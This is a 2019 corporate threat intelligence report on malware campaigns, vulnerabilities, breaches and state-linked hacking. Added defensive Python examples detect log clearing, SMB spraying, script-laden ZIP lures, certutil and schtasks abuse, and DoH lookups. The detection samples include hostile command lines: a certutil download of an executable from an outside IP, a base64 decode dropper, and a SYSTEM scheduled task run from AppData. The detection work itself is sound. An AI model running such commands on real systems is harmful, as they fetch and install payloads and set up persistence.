October 2019

Threat Intelligence Report

Manufacturing/Public Sector

IN THIS ISSUE • October is Cyber Security Awareness Month • Ecuador suffers massive data breach • Emotet returns after 4-month break • Campaign targets U.S. taxpayers • APT33 targets aerospace and energy sectors

About this report

Fusing a range of public and proprietary information feeds, including DXC's global network of security operations centers and cyber intelligence services, this DXC Technology report delivers an overview of major incidents, insights into key trends and strategic threat awareness.

This report is a part of DXC Labs | Security, which provides insights and thought leadership to the security industry.

Intelligence cutoff date: 26 September 2019

Mark Hughes, Senior Vice President and General Manager of Security

October is Cyber Security Awareness Month and the perfect time to assess the threat to your enterprise and the motivations of attackers. This month saw the return of Emotet after four months of inactivity, a new ransomware strain targeting enterprises, and new phishing campaigns that target enterprises and users globally. Data security also features prominently this month as Ecuador investigates an unsecured database containing the personal details of over 20 million citizens. Read more in this month's report.

Table of Contents

Threat updates
• Cyber Security Awareness Month: Know your attackers (Multi-industry)
• Emotet returns after 4-month break (Multi-industry)
• TFlower ransomware poses new threat to enterprises (Multi-industry)
• Campaign targets U.S. taxpayers (Multi-industry)
• Cross-platform Glupteba adds worm capability (Multi-industry)
• PsiXBot hides command and control name resolution in HTTPS (Media/Entertainment)

Vulnerability updates
• Critical vulnerability in Exim mail server (Multi-industry)
• Updates released to counter critical vulnerabilities in Google Chrome and Internet Explorer (Multi-industry)
• Exploit code released for BlueKeep vulnerability (Multi-industry)
• LastPass Password manager leaks credentials (Multi-industry)

Incidents/Breaches
• U.S. government contractor Miracle Systems potentially breached (Defense)
• Ecuador citizens data exposed in unsecured database (Public Sector, Technology)
• Ransomware attacks disrupt 49 U.S. school districts and educational institutions (Public Sector)
• French authorities dismantle global botnet (Multi-industry)

Nation state & geopolitical updates
• Asian telecommunications companies targeted by Chinese-linked threat actors (Technology and Communications)
• Iranian-linked threat actors target energy and aerospace sectors (Defense)

Threat updates

Cyber Security Awareness Month: Know your attackers

The key to being cyber aware is understanding the motivations and tactics of your attackers. To mark Cyber Security Awareness Month, DXC focuses on the five primary types of cyber attackers: nation-state, cybercriminals, hacktivists, lone-wolf and insider threats.

Nation-state attackers: These state-backed attackers typically focus on projecting power in a region or gaining an economic or political advantage over a rival. Their activities range from traditional espionage to disrupting adversaries by leaking confidential data.

Nation-states are often associated with advanced persistent threats (APTs), in which an attacker gains access to a system and remains undetected for an extended period. These groups typically use the most sophisticated techniques. One of the most infamous nation-state hacking groups is Russian-backed APT28, also known as Strontium, which was recently observed exploiting internet of things (IoT) devices, including a VoIP phone, an office printer and a video decoder.

Nation-state activity is increasing around the globe. New reports accuse the Chinese government of intrusions into telecommunications networks to track Asian dissidents, and Iran is likely to ramp up its cyber espionage efforts against Saudi Arabia and the United States. Government agencies, defense contractors and critical infrastructure are key potential targets.

8,000 - Microsoft enterprise customers targeted or compromised by nation-state attacks in 2019

Cyber criminal groups: Cyber criminal groups, motivated by financial gain, have shifted from targeting end users to more sophisticated big game hunting, with large corporations and government agencies as their targets.

The public sector has become a major target. Over the past 6 months, cyber criminal campaigns used ransomware to lock down city government services in five U.S. states, plus 23 Texas towns, and 500 schools and colleges.

Notorious payment-card skimming family Magecart is also acting opportunistically. Employing a new tactic, Magecart bots recently infected 17,000 websites by exploiting improperly configured Amazon S3 buckets to steal card information. These types of threats underscore the need for rigorous cyber defenses as well as a plan for how to respond and recover, including a decision made in advance on whether or not to pay a ransom.

78 days - Global median time to detect a breach in 2019

Hacktivists: Hacktivists are politically motivated, ideology-driven actors. One well-known hacktivist group first made headlines when it retaliated against the Church of Scientology's perceived internet censorship using distributed denial-of-service (DDoS), spamming and other attacks.

Increasingly, social media is the target, as evidenced by the account takeover of Twitter cofounder Jack Dorsey — crusader against online hate groups — which was used to send out pro-Nazi tweets. Even law enforcement is not immune, with London’s Metropolitan Police Twitter account sending out a series of bizarre and profane messages in July.


Hacktivists typically have lower levels of technical sophistication, and social media accounts offer a soft target that allows them to project their disruptive efforts to a wide audience. Organizations should carefully consider security basics around corporate social media platforms, including monitoring, auditing and requirements for complex passwords and multifactor authentication.

Lone-wolf hackers: Not part of an organized crime group, lone-wolf hackers are often opportunists motivated by financial gain. In some cases, lone-wolf hackers can grow their ranks quickly. In addition to the two lone wolves arrested for the TalkTalk hack of nearly 160,000 customer accounts, authorities suspected that at least 10 more individuals were involved in the scheme to extort the company’s CEO.

Lone-wolf hackers are more likely to target smaller organizations, public agencies and NGOs. Their aim is usually to gain access to data that can be sold on the dark web, or to sensitive or embarrassing data that can be used for extortion.

184% - Increase in average ransom payment in Q2 2019

Insider threats

Unlike organized cyber crime groups, malicious insiders often operate on a small scale, looking for opportunities for personal gain, or for retribution against a real or perceived slight by their employer.

The prospect of monetary gain drives many insider threats with opportunities to embezzle or sell stolen proprietary information. For example, a disgruntled IT engineer at Scale AI hacked the company network and made hundreds of small fraudulent payments into PayPal accounts before getting caught. In 2018, Tesla CEO Elon Musk announced that an insider exported large amounts of highly sensitive Tesla data to unknown third parties.

Another potential motivator for insiders is whistleblowing. Disenfranchised workers can do significant reputation damage by publicly exposing what they consider to be unethical practices, even if the accusations later prove to be unfounded.

Insider threats are among the most complex to detect and prevent. A maliciously motivated insider often has intimate knowledge of the company's internal network and security configurations, as well as the requisite skills to operate bespoke tooling.

Preventing such attacks requires a layered approach and mature security architecture. AI-powered endpoint protection and user-behavior analytics within the SIEM can help identify malicious actions, such as the clearing of audit logs, suspicious access to materials or access to systems at unusual times. Further, privileged users should be audited more frequently and thoroughly.

Emotet returns after 4-month break

Emotet spam campaigns have returned after a four-month period of inactivity with a new malspam campaign. On September 16, Malwarebytes and Spamhaus spotted a series of new spam emails written in Italian, Polish and German that contained a document-themed lure in the form of either a malicious attachment or links to malicious documents online. This was followed approximately 24 hours later by English-language phishing messages with a subject line containing the phrase "Payment Remittance Advice."

This latest wave of phishing messages targeted domains across a range of countries including Argentina, Germany, the United States and the United Kingdom.

Impact

Possibly the biggest threat posed by Emotet is that it can be used as a delivery vector for more dangerous payloads. Emotet Trojans have been partnered with TrickBot and Ryuk ransomware strains to create a combination that ensures maximum penetration through the network, stealing valuable data and encrypting systems to extort organizations into paying large ransoms.

DXC perspective

Denial of initial access is key to malware prevention. Effective identity and access management controls, network access controls, phishing mail protections, training and next-generation endpoint solutions can all help prevent account compromise and malware delivery. In addition to prevention, organizations should construct and regularly test data recovery plans. Backups should be logically isolated to protect them from infection.

Source: ThreatPost

Known Emotet Spreader Modules

• NetPass: Recovers all network passwords stored on a system for the logged-on user.
• Outlook Scraper: Scrapes names, dates, email addresses and email bodies from Outlook accounts. Information found in the email account is then used to send out additional phishing emails from the compromised account.
• WebBrowserPassView: Password recovery module that captures passwords stored by Internet Explorer, Google Chrome, Safari and Opera. Credentials found are passed to the Credential Enumerator module.
• Mail PassView: Recovers passwords and account details for email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! and Gmail. Credentials found are passed to the Credential Enumerator module.
• Credential Enumerator: Enumerates writable network share drives over SMB using credentials found on the system and brute force techniques. Once a writable system is found, Emotet propagates to the new system.

TFlower ransomware poses new threat to enterprises

A new crypto-ransomware threat known as TFlower has been seen targeting corporate environments. First discovered in August 2019, TFlower makes its way into a corporate network after attackers compromise machines through exposed Remote Desktop Services.

Impact

This attack vector enables adversaries to infect local machines with TFlower before attempting to move laterally through the network using PowerShell Empire and other tools to generate even more infections.
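The two detection opportunities described above, the insider-threat section's "clearing of audit logs" and "access of systems at unusual times", and the Credential Enumerator's SMB brute force across the network, both surface in the Windows Security log. The following is an added example (not DXC's, Emotet's or any SIEM vendor's code) of the three rules a SOC would run over those events. The event records are constructed here with a subset of the real Security-log fields (EventID, TimeCreated, TargetUserName/SubjectUserName, LogonType, IpAddress, Computer); the business-hours window and spray threshold are assumptions to be tuned per environment.

```python
"""Windows Security log triage: audit-log clearing, off-hours interactive
logons, and one source host spraying SMB (type-3) logons across many hosts
before landing on one of them."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry).
EVENTS = [
    {"EventID": 4624, "TimeCreated": "2019-09-18T09:12:00", "TargetUserName": "jdoe",
     "LogonType": 2, "IpAddress": "-", "Computer": "WS01"},
    {"EventID": 1102, "TimeCreated": "2019-09-18T23:41:10", "SubjectUserName": "jdoe",
     "Computer": "FS01"},
    {"EventID": 4624, "TimeCreated": "2019-09-19T02:17:00", "TargetUserName": "jdoe",
     "LogonType": 10, "IpAddress": "10.0.5.7", "Computer": "FS01"},
]
# Emotet-style spray: 10.0.5.7 fails type-3 (network/SMB) logons on 12 hosts in
# 12 seconds, then succeeds on one of them.
for i in range(12):
    EVENTS.append({"EventID": 4625, "TimeCreated": f"2019-09-19T03:00:{i:02d}",
                   "TargetUserName": "administrator", "LogonType": 3,
                   "IpAddress": "10.0.5.7", "Computer": f"WS{i:02d}"})
EVENTS.append({"EventID": 4624, "TimeCreated": "2019-09-19T03:00:15",
               "TargetUserName": "administrator", "LogonType": 3,
               "IpAddress": "10.0.5.7", "Computer": "WS07"})

BUSINESS_HOURS = range(7, 20)   # 07:00-19:59 local time (assumption for this example)
SPRAY_WINDOW = timedelta(minutes=5)
SPRAY_THRESHOLD = 10            # distinct target hosts failed from one source (assumption)


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def audit_log_cleared(events):
    """Event 1102 (Security log cleared) is almost never legitimate outside
    planned maintenance; return (who, where) for each occurrence."""
    return [(e["SubjectUserName"], e["Computer"]) for e in events if e["EventID"] == 1102]


def off_hours_interactive_logons(events):
    """Interactive (2), unlock (7) or RDP (10) logons outside business hours."""
    return [(e["TargetUserName"], e["Computer"], e["TimeCreated"])
            for e in events
            if e["EventID"] == 4624 and e.get("LogonType") in (2, 7, 10)
            and _ts(e).hour not in BUSINESS_HOURS]


def smb_spray_sources(events):
    """Sources whose type-3 logon failures hit >= SPRAY_THRESHOLD distinct hosts
    within SPRAY_WINDOW; for each, list the hosts where a type-3 logon from that
    source later succeeded (where the worm landed)."""
    failures = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and e.get("LogonType") == 3:
            failures[e["IpAddress"]].append((_ts(e), e["Computer"]))
    successes = {(e["IpAddress"], e["Computer"]) for e in events
                 if e["EventID"] == 4624 and e.get("LogonType") == 3}
    findings = {}
    for src, fails in failures.items():
        fails.sort()
        for i, (t0, _) in enumerate(fails):          # sliding window over failures
            hosts = {h for t, h in fails[i:] if t - t0 <= SPRAY_WINDOW}
            if len(hosts) >= SPRAY_THRESHOLD:
                findings[src] = {"hosts_failed": len(hosts),
                                 "succeeded_on": sorted(h for s, h in successes if s == src)}
                break
    return findings


if __name__ == "__main__":
    print("audit log cleared:", audit_log_cleared(EVENTS))
    print("off-hours logons:", off_hours_interactive_logons(EVENTS))
    print("SMB spray:", smb_spray_sources(EVENTS))
```

The spray rule keys on the source address rather than the target account on purpose: Emotet's enumerator tries harvested credentials against every writable share it can reach, so the failures are spread across many target hosts and a per-account lockout threshold never trips.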

DXC perspective

TFlower fits the trend of cyber criminals using big game hunting tactics, increasingly targeting businesses and government agencies with ransomware rather than individual users in an attempt to extract larger ransoms and a higher return on their time investment.

Ransomware is too profitable for criminal groups for it to disappear, and DXC expects the threat will continue to evolve for the foreseeable future. Source: Bleeping Computer

Campaign targets U.S. taxpayers

A new phishing campaign with U.S. tax-related email lures is infecting victims with the Amadey botnet.

The Amadey bot was first seen for sale on Russian malware forums in February 2019. Amadey itself is fairly limited, with only credential-stealing capability. Its primary function is to serve as a downloader/installer for other malware and campaigns.

Impact

This campaign begins with a phishing email notifying the user of an income tax refund from the U.S. Internal Revenue Service. When the user clicks the link, the fake tax portal tells the user to download a document (in zip file format) to fill out and upload. If the user extracts the zip contents, a Visual Basic Script is executed, infecting the victim with Amadey.
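The lure above only works because a ZIP that claims to hold a "document" actually carries a VBScript. The following is an added example (not Amadey's or Cofense's code) of the attachment check a mail gateway or mailbox hook can apply before the archive reaches a user: it reads only the ZIP central directory, never extracts to disk, and quarantines on script or executable members, double-extension masquerades such as `form.pdf.vbs`, encrypted members it cannot scan, and bomb-like compression ratios. The archives, file names and thresholds are constructed for this example.

```python
"""Mail-gateway style inspection of a ZIP attachment for script payloads."""
import io
import zipfile

# Extensions the Windows shell hands to an interpreter or loader on double-click.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1",
               ".bat", ".cmd", ".scr", ".exe", ".com", ".pif", ".lnk"}
ZIP_BOMB_RATIO = 100                  # uncompressed/compressed ratio; assumption
MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024   # assumption


def _last_ext(name):
    """Extension the shell will actually use: last suffix, ignoring trailing
    dots/spaces that Windows strips (so 'refund.pdf.vbs. ' -> '.vbs')."""
    base = name.rsplit("/", 1)[-1].rstrip(". ")
    return ("." + base.rsplit(".", 1)[1].lower()) if "." in base else ""


def inspect_zip(data: bytes):
    """Return {'verdict': 'allow'|'quarantine', 'reasons': [...], 'members': [...]}."""
    reasons, members = [], []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"verdict": "quarantine", "reasons": ["not a valid zip"], "members": []}
    total_unc = total_comp = 0
    for info in zf.infolist():
        members.append(info.filename)
        total_unc += info.file_size
        total_comp += max(info.compress_size, 1)
        ext = _last_ext(info.filename)
        stem = info.filename.rsplit("/", 1)[-1].lower()
        if ext in SCRIPT_EXTS:
            reasons.append(f"executable/script member: {info.filename}")
            if any(x in stem for x in (".pdf.", ".doc.", ".docx.", ".xls.", ".txt.")):
                reasons.append(f"double-extension masquerade: {info.filename}")
        if info.flag_bits & 0x1:          # general-purpose bit 0: member is encrypted
            reasons.append(f"encrypted member (cannot be scanned): {info.filename}")
    if total_unc > MAX_TOTAL_UNCOMPRESSED or total_unc / max(total_comp, 1) > ZIP_BOMB_RATIO:
        reasons.append("suspicious compression ratio or size")
    return {"verdict": "quarantine" if reasons else "allow",
            "reasons": reasons, "members": members}


def build_sample_lure():
    """Constructed sample: tax-form name, VBScript suffix, inert placeholder body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("IRS_Refund_Form_1040.pdf.vbs",
                    "' constructed placeholder, not a real dropper\nWScript.Echo \"lure\"\n")
    return buf.getvalue()


def build_benign_sample():
    """Constructed sample: a plain text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("report.txt", "quarterly numbers\n" * 20)
    return buf.getvalue()


if __name__ == "__main__":
    for blob in (build_sample_lure(), build_benign_sample(), b"not a zip"):
        print(inspect_zip(blob))
```

Note that the check keys on the *last* extension after trailing dots and spaces are removed, because that is what Explorer uses when it chooses a handler; matching on the first dot would let `1040.pdf.vbs` through as a PDF.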

DXC perspective

Phishing campaigns can present quite convincing lures. Timely emails with current topics, especially those like tax communications that may be commonplace and appear legitimate, require added vigilance to protect against infections and scams. Periodic cyber security training should present phishing scenarios to equip users with awareness of such threats.

Source: Cofense

Cross-platform Glupteba malware adds worm capability

Updates to Glupteba malware include a router exploit and usage of Windows built-in utilities.

Glupteba is a long-lived infostealer malware, active since at least 2011 and with infections in almost every country globally since 2018. Now, Glupteba’s code base has been updated to Golang, an open source programming language that may enable cross- platform execution (on different operating systems). Initial infection is via fake software advertisements and free download bundles.

Impact

Glupteba establishes persistence with Windows Task Scheduler (schtasks.exe) and then installs additional modules using the Windows Certificate Utility (certutil.exe), with some of the malicious downloaded modules even hosted on Microsoft Azure. Glupteba scans the network for unpatched Windows PCs to exploit with EternalBlue and looks for vulnerable MikroTik routers to exploit other networks.
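Both of the living-off-the-land steps above, persistence via schtasks.exe and payload download via certutil.exe, leave a process command line in Sysmon Event 1 or Security Event 4688. The following is an added example (not Glupteba's or Cybereason's code) of two rules over those command lines: one for certutil's download cradle (`-urlcache -split -f <url>`) and base64 `-decode` dropper, one for a scheduled task whose action runs from a user-writable path or through an interpreter. The sample command lines are constructed, not captured Glupteba telemetry, and the path patterns are assumptions to tune against a baseline.

```python
"""LOLBin rules over process-creation command lines: certutil downloads and
schtasks persistence."""
import re
import shlex


def _argv(cmdline: str):
    """Windows command lines are not POSIX, but shlex in non-POSIX mode keeps
    backslashes literal and treats "quoted paths" as one token, which is
    enough to tokenise certutil/schtasks invocations."""
    return [t.strip('"').lower() for t in shlex.split(cmdline, posix=False)]


def _exe(argv):
    return argv[0].rsplit("\\", 1)[-1] if argv else ""


def certutil_download(argv):
    """certutil -urlcache [-split] -f <url> <out> is the download-cradle form;
    -decode turns a base64 'certificate' file back into a PE."""
    if _exe(argv) != "certutil.exe":
        return None
    flags = {a.lstrip("-/") for a in argv[1:] if a and a[0] in "-/"}
    urls = [a for a in argv if re.match(r"^(https?|ftp)://", a)]
    if "urlcache" in flags and urls:
        return {"rule": "certutil_urlcache_download", "url": urls[0]}
    if "decode" in flags:
        return {"rule": "certutil_base64_decode", "url": None}
    return None


# Assumed-suspicious task actions: user-writable locations or script hosts/loaders.
SUSPICIOUS_TASK_ACTION = re.compile(
    r"(\\users\\|\\appdata\\|\\programdata\\|\\temp\\|%temp%|%appdata%|"
    r"powershell|cmd\.exe /c|certutil|mshta|wscript|cscript|regsvr32|rundll32)",
    re.IGNORECASE)


def schtasks_persistence(argv):
    """schtasks /create ... /tr <action> [/ru SYSTEM]: flag suspicious actions
    and note whether the task was registered to run as SYSTEM."""
    if _exe(argv) != "schtasks.exe" or "/create" not in argv:
        return None
    action = None
    for i, a in enumerate(argv[:-1]):
        if a == "/tr":
            action = argv[i + 1]
    if action and SUSPICIOUS_TASK_ACTION.search(action):
        as_system = any(a == "/ru" and argv[i + 1] in ("system", "nt authority\\system")
                        for i, a in enumerate(argv[:-1]))
        return {"rule": "schtasks_suspicious_action", "action": action,
                "run_as_system": as_system}
    return None


def evaluate(cmdline: str):
    """First matching rule for one process-creation command line, or None."""
    argv = _argv(cmdline)
    return certutil_download(argv) or schtasks_persistence(argv)


# Constructed samples (not captured Glupteba telemetry).
SAMPLES = [
    r'certutil.exe -urlcache -split -f http://198.51.100.7/app.exe C:\Users\Public\app.exe',
    r'C:\Windows\System32\certutil.exe -decode C:\ProgramData\cert.txt C:\ProgramData\x.exe',
    r'schtasks.exe /create /tn "csrss" /tr "C:\Users\bob\AppData\Roaming\csrss\x.exe" /sc minute /mo 10 /ru SYSTEM /f',
    r'certutil.exe -hashfile C:\Windows\notepad.exe SHA256',
    r'schtasks.exe /create /tn "Backup" /tr "C:\Program Files\Backup\bk.exe" /sc daily',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(evaluate(s), "<-", s)
```

The last two samples are the benign controls: a certutil hash check and a task action under Program Files should not fire, and a rule that fires on every certutil or schtasks invocation will be tuned out by the SOC within a week.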

DXC perspective

Malware with worm capability is a critical threat to internal networks, especially in a corporate environment where strong defenses are sometimes only part of the perimeter. Asset discovery, patching, network segregation and role separation are vital tactics in removing some of the intrinsic trusts that make corporate networks vulnerable to worm attacks.

Source: Cybereason

PsiXBot hides command-and-control name resolution in HTTPS

In mid-August 2019 a new version of the PsiXBot malware was seen using Google's DNS over HTTPS (DoH) service to resolve C2 server domains. PsiXBot was first observed in 2017 and has been classified as an information, credential and cryptocurrency stealer.

Impact

This latest version uses Google's free public DoH service. In traditional DNS, a query is sent in cleartext to a local ISP or public DNS server, and the response (the resolved IP address) is sent back to the requesting client. DoH wraps the same query in HTTPS (TLS), so intermediary devices cannot observe the request or response unless they terminate and inspect the TLS session; all they see is an HTTPS connection to the resolver. By using Google DoH, PsiXBot evades typical detection and blocking based on the malware C2 domain name.
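What a DoH request looks like on the wire, and what a TLS-inspecting proxy can recover from it, as an added example (not PsiXBot's or Proofpoint's code): the DNS query is built by hand in RFC 1035 wire format, wrapped in the two request shapes RFC 8484 defines (GET with a base64url `dns=` parameter, or POST with `application/dns-message`), and a classifier on the proxy side decodes the queried name so the existing C2 domain blocklist still applies. No packets are sent; the endpoint list is Google's public resolvers and `c2.example` is a placeholder, not a real PsiXBot domain. Without TLS termination the proxy sees only the destination (dns.google or 8.8.8.8 on 443), and blocking that also breaks browsers with DoH enabled, which is the trade-off behind "end-to-end inspection" in the DXC perspective.

```python
"""DoH on the wire (RFC 8484) and proxy-side recovery of the queried name."""
import base64
import struct
from urllib.parse import parse_qs, urlsplit

DOH_HOSTS = {"dns.google", "8.8.8.8", "8.8.4.4"}   # Google's public DoH endpoints
BLOCKLIST = {"c2.example"}                          # placeholder entry (assumption)


def encode_name(name: str) -> bytes:
    """Labels as <len><bytes>..., terminated by a zero length (RFC 1035 §3.1)."""
    labels = name.rstrip(".").split(".")
    return b"".join(struct.pack("B", len(lbl)) + lbl.encode() for lbl in labels) + b"\x00"


def build_query(name: str, qtype: int = 1, txid: int = 0) -> bytes:
    """Minimal DNS query: 12-byte header with RD set, one question, class IN.
    RFC 8484 clients use transaction ID 0 so responses are cacheable."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)


def doh_get(name: str):
    """The GET form: base64url without padding in the 'dns' parameter."""
    q = base64.urlsafe_b64encode(build_query(name)).rstrip(b"=").decode()
    return "GET", f"https://dns.google/dns-query?dns={q}", {}, b""


def doh_post(name: str):
    """The POST form: raw DNS message as the body."""
    return ("POST", "https://dns.google/dns-query",
            {"content-type": "application/dns-message"}, build_query(name))


def decode_name(msg: bytes, off: int):
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:                      # compression pointer; never valid in a question
            raise ValueError("compressed name in question")
        labels.append(msg[off:off + n].decode())
        off += n


def qname_from_message(msg: bytes) -> str:
    """Name in the first question of a DNS message."""
    if struct.unpack(">H", msg[4:6])[0] < 1:
        raise ValueError("no question section")
    return decode_name(msg, 12)[0]


def classify(method: str, url: str, headers: dict, body: bytes):
    """Proxy-side view after TLS termination.
    Returns ('not-doh', None), ('doh', qname) or ('doh-blocked', qname)."""
    u = urlsplit(url)
    ctype = headers.get("content-type", "").lower()
    is_doh = (u.hostname in DOH_HOSTS and u.path == "/dns-query") or ctype == "application/dns-message"
    if not is_doh:
        return "not-doh", None
    if method == "GET":
        enc = parse_qs(u.query).get("dns", [""])[0]
        raw = base64.urlsafe_b64decode(enc + "=" * (-len(enc) % 4))   # restore padding
    else:
        raw = body
    name = qname_from_message(raw)
    if name.lower().rstrip(".") in BLOCKLIST:
        return "doh-blocked", name
    return "doh", name


if __name__ == "__main__":
    for req in (doh_get("c2.example"), doh_post("www.example.com"),
                ("GET", "https://www.example.com/", {}, b"")):
        print(classify(*req))
```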

This new version of PsiXBot also contains an unfinished module that in a future version will capture evidence of the Windows user viewing pornography-related content. This is likely for blackmail or sextortion payment scenarios.


DXC perspective

Just as HTTPS provides secrecy and security for web viewing and online transactions, DoH provides secrecy and privacy for domain name resolution. We continue to see malware that uses and abuses new web technologies for evasion. A layered security approach with end-to-end inspection is necessary to stay ahead of these advances.

Source: Proofpoint

Vulnerability updates

Critical vulnerability in Exim mail server

On September 6, 2019, the Exim development team released a security update for a critical remote code execution (RCE) vulnerability designated CVE-2019-15846. Exim is a popular open source mail transfer agent (MTA) used on the Internet to send and receive email messages.

Impact

Attackers who successfully exploit the vulnerability gain root access, giving them full administrative control of the target system. All versions of Exim up to and including 4.92.1 are affected in the default configuration; the fix is in 4.92.2.

DXC perspective

Currently, there are no reports of this vulnerability being exploited in the wild. However, given that it is possible to trigger this vulnerability remotely without credentials or user interaction, it has the potential to be exploited as part of a fast-moving, global malware attack.

It is highly likely that public exploits for this vulnerability will be available within days or weeks. Historically, unauthenticated remote code execution vulnerabilities such as this are prime targets for inclusion in automated and worm-based attacks. DXC recommends that organizations escalate patching for vulnerable Exim deployments.

Source: Exim Development Team

Updates released to counter critical vulnerabilities in Google Chrome and Microsoft Internet Explorer

In September Google and Microsoft released a series of security updates to counter critical remote code execution vulnerabilities in their Chrome and Internet Explorer web browsers.

Impact

Exploiting the vulnerabilities on either platform would allow an attacker to execute code on the victim's machine; exploitation requires the user to visit a website hosting specially crafted web pages containing malicious code. Microsoft elected to bypass its normal monthly update pattern and release its patch as an emergency out-of-band security update, citing active attacks seen in the wild; DXC has not seen independent evidence of active exploitation of the Internet Explorer vulnerability at the time of writing. There are currently no reports of the Chrome vulnerabilities being exploited in the wild.

DXC perspective

Web browsers have become the primary mechanism for accessing network-connected systems and are installed on almost all end user devices by default. This makes browser access a very attractive target for threat groups.

Users are often lured to malicious websites using spam email, spam instant messages, search engine advertisements, malvertising campaigns and other enticements so malware can be installed.

Browser updates should be applied to all systems, including servers, to ensure that these vulnerabilities are mitigated. Windows systems likely have Internet Explorer installed by default, and the security update should be applied even if Internet Explorer is not commonly used. Source: Microsoft, Google

Proof-of-concept exploit code released for BlueKeep vulnerability

On September 6, 2019, Rapid7 released an initial public exploit module for CVE-2019-0708, also known as BlueKeep, for the Metasploit exploitation framework. The initial public module is limited to a subset of the affected platforms (including Windows Server 2008 R2) and requires a nondefault configuration change on Server versions of Windows for successful exploitation, a limitation that may be removed in future updates.

Impact

While it is likely that more advanced threat actors have been working on exploits for the BlueKeep vulnerability since its disclosure, the release of the public exploit module for the Metasploit framework makes it much more accessible to lower-capability threat actors.

DXC perspective

Rapid7 has placed limitations on the capabilities of the public module; however, it is likely these will be removed or circumvented by technically adept actor groups, which could lead to the module being incorporated into a botnet or worm.

DXC recommends organizations ensure patching of vulnerable Windows deployments has been completed.

Source: Rapid7
Resources: Microsoft

Incidents and breaches

U.S. government contractor Miracle Systems potentially breached

On September 9, 2019, security researcher Brian Krebs reported that the U.S. Secret Service was investigating a potential breach of Miracle Systems, a government contractor serving more than 20 federal agencies.

Impact

Access to several systems belonging to Miracle Systems was put up for sale on a Russian-language cybercrime forum in mid-August for 6 bitcoins (approximately $60,000). Screenshots posted to the cybercrime forum as proof of access included internet addresses linked to systems at several U.S. government agencies.

Miracle Systems has stated the data and network information for sale was from older testing systems, and that the systems affected were test systems and not connected to any government clients.

DXC perspective

According to news accounts, the CEO of Miracle Systems believes the attacker gained system access through a phishing attack, despite corporate warnings sent to staff about the dangers of malicious emails.

Continuous education of employees on the dangers of phishing, particularly how to recognize suspicious emails, is imperative, but should be augmented with additional security measures. Effective identity and access management controls, two-factor authentication, network access controls, phishing mail protections, training and next- generation endpoint solutions can all help prevent account compromise. Source: KrebsOnSecurity

Public data exposed in unsecured database in Ecuador

On September 16, security researchers at vpnMentor reportedly discovered an unsecured database containing over 20 million records on Ecuadorian citizens. The database contained 20.8 million user records, despite Ecuador having a population of only 16.6 million, and included details on children born as recently as spring 2019.

Impact

The data contained citizens' full names, dates of birth, places of birth, home addresses, marital status, national ID numbers, work information, phone numbers and education levels. According to news media, the data appears to have been gathered from multiple government sources by Novaestrat, a company that provides analytics services for the Ecuadorian market.

3,816 - Number of publicly disclosed data breaches in first 6 months of 2019

DXC perspective

This data breach reveals a significant amount of personal data about Ecuadorian citizens that may lead to identity theft and the targeting of specific individuals in future cyber attacks.

The exposure is the most recent example of data being stored online with no authentication at all. Although usually caused by human error rather than malicious intent, data exposure has been a recurring theme in 2019.

Implementation of security fundamentals, such as appropriate authentication configuration, patch management and the visibility and audit of assets, could have prevented nearly all 2019 exposures. Organizations with databases holding sensitive information should further harden their defenses by preventing public IP access where possible, avoiding common ports, closing unnecessary services and requiring the use of proxies for access.

Source: ZDNet

Other News
• Ransomware attacks disrupt 49 U.S. school districts and educational institutions
• LastPass Password manager leaks credentials
• North Korean hackers targeting ATMs in India
• French authorities dismantle global botnet
• How Twitter CEO Jack Dorsey's account was hacked

Nation State & Geopolitical Updates

Asian telecommunications companies targeted by threat actors linked to China

Earlier this month intelligence officials and security consultants blamed groups affiliated with the Chinese government for intrusions into telecommunications networks to track dissidents in central and southeast Asia. The targeting of specific telecoms operators closely follows several public reports about Beijing's use of compromised websites and iOS vulnerabilities to target the Uighur and other dissident communities.

Impact

The intrusions reportedly stemmed from more than one group of Chinese operators and targeted telecoms networks in at least Turkey, Kazakhstan, India, Thailand and Malaysia; however, the specific companies compromised have not been disclosed. China has denied any involvement in cyber attacks.

DXC perspective

Industry reporting, along with China-based intrusions previously observed by DXC's strategic intelligence partners, indicates a sustained campaign by China to use its cyber capabilities to collect information on dissident communities.

DXC assesses with high confidence that these operations will continue to target dissident communities and will likely escalate in the future. It is also likely that these operations will expand to include academic institutions, nongovernmental organizations (NGOs) and news media organizations that interact with and conduct research into these communities and the impact of state policies on them.

Source: CrowdStrike Intelligence, Volexity, Reuters

Iranian-linked threat actors target energy and aerospace sectors

Industry reporting in late September 2019 identified a spear phishing campaign targeting aerospace, petrochemical and energy sector organizations in the United States, Saudi Arabia and South Korea.

Impact

The campaign emails include advertisements for jobs at Saudi Arabian aviation companies and Western organizations and carry recruitment-themed lure documents with links to malicious HTML application (HTA) files. The HTA files contain job descriptions and links to job postings on employment websites relevant to the targeted individuals, as well as embedded code that installs a custom backdoor on the system.

Based on previous operational targeting and the tactics used in this operation, APT33, an Iranian threat group with links to Iran’s Islamic Revolutionary Guard Corps (IRGC), is believed to be behind this operation.

DXC perspective

APT33 is a highly skilled and well-resourced adversary with a history of cyber espionage activity dating back to 2013. Since March 2019, APT33 has been observed targeting U.S. government and financial sector entities, as well as Saudi companies involved in healthcare, metals, engineering and technology.

DXC believes this activity may indicate an expansion in Iran’s cyber espionage efforts, potentially in response to the deterioration in political relations between Iran, Saudi Arabia and the United States. Intelligence also suggests this activity may be indicative of a wider ongoing operational movement, or the laying of groundwork for future cyber espionage operations.

Organizations need to monitor their networks for evidence of suspected APT33 activity.

Source: ThreatPost, FireEye


